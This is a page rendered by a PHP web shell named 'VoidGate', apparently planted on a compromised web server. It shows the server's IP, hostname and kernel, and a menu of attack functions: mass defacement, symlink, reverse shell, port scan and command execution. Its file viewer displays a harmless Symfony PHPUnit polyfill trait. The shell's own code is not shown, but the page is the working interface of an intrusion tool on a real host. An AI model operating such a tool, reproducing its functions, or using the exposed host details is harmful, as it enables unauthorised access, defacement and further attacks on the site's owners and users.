ヤミRoot VoidGate
User / IP
:
216.73.216.81
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
symfony
/
phpunit-bridge
/
Legacy
/
Viewing: PolyfillTestCaseTrait.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Bridge\PhpUnit\Legacy; use PHPUnit\Framework\Error\Error; use PHPUnit\Framework\Error\Notice; use PHPUnit\Framework\Error\Warning; /** * This trait is @internal. */ trait PolyfillTestCaseTrait { /** * @param string $messageRegExp * * @return void */ public function expectExceptionMessageMatches($messageRegExp) { $this->expectExceptionMessageRegExp($messageRegExp); } /** * @return void */ public function expectNotice() { $this->expectException(Notice::class); } /** * @param string $message * * @return void */ public function expectNoticeMessage($message) { $this->expectExceptionMessage($message); } /** * @param string $regularExpression * * @return void */ public function expectNoticeMessageMatches($regularExpression) { $this->expectExceptionMessageMatches($regularExpression); } /** * @return void */ public function expectWarning() { $this->expectException(Warning::class); } /** * @param string $message * * @return void */ public function expectWarningMessage($message) { $this->expectExceptionMessage($message); } /** * @param string $regularExpression * * @return void */ public function expectWarningMessageMatches($regularExpression) { $this->expectExceptionMessageMatches($regularExpression); } /** * @return void */ public function expectError() { $this->expectException(Error::class); } /** * @param string $message * * @return void */ public function expectErrorMessage($message) { $this->expectExceptionMessage($message); } /** * @param string $regularExpression * * @return void */ public function expectErrorMessageMatches($regularExpression) { $this->expectExceptionMessageMatches($regularExpression); } }
Coded With 💗 by
0x6ick